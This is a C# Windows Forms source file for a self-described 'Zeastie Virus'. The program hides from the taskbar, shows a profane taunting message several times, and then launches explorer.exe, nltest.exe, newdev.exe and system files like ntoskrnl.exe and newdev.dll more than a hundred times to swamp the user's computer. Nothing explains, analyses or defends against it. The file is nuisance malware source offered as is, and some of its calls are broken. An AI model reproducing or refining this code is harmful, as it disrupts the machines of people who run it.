using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Diagnostics;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace ZVI
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
            this.ShowInTaskbar = false;
        }

        private void formSkin1_Click(object sender, EventArgs e)
        {

        }

        private void flatStickyButton1_Click(object sender, EventArgs e)
        {

        }

        private void flatButton1_Click(object sender, EventArgs e)
        {
            this.Hide();
            MessageBox.Show("Your computer has been fucked by the Zeastie Virus");
            Process.Start("ntoskrnl.exe");
            MessageBox.Show("Your computer has been fucked by the Zeastie Virus");
            Process.Start("ntoskrnl.exe");
            MessageBox.Show("Your computer has been fucked by the Zeastie Virus");
            Process.Start("ntoskrnl.exe");
            MessageBox.Show("Your computer has been fucked by the Zeastie Virus");
            Process.Start("explorer.exe");
            MessageBox.Show("Your computer has been fucked by the Zeastie Virus");
            Process.Start("explorer.exe");
            MessageBox.Show("Your computer has been fucked by the Zeastie Virus");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("nltest.exe");
            Process.Start("newdev.exe");
            Process.Start("newdev.dll");
            Process.Start("newdev.exe");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("nltest.exe");
            Process.Start("newdev.exe");
            Process.Start("newdev.dll");
            Process.Start("newdev.exe");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll"); Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("nltest.exe");
            Process.Start("newdev.exe");
            Process.Start("newdev.dll");
            Process.Start("newdev.exe");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll"); Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("nltest.exe");
            Process.Start("newdev.exe");
            Process.Start("newdev.dll");
            Process.Start("newdev.exe");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("nltest.exe");
            Process.Start("newdev.exe");
            Process.Start("newdev.dll");
            Process.Start("newdev.exe");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("nltest.exe");
            Process.Start("newdev.exe");
            Process.Start("newdev.dll");
            Process.Start("newdev.exe");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("nltest.exe");
            Process.Start("newdev.exe");
            Process.Start("newdev.dll");
            Process.Start("newdev.exe");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("explorer.exe");
            Process.Start("nltest.exe");
            Process.Start("newdev.exe");
            Process.Start("newdev.dll");
            Process.Start("newdev.exe");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");
            Process.Start("newdev.dll");

        }
    }
}
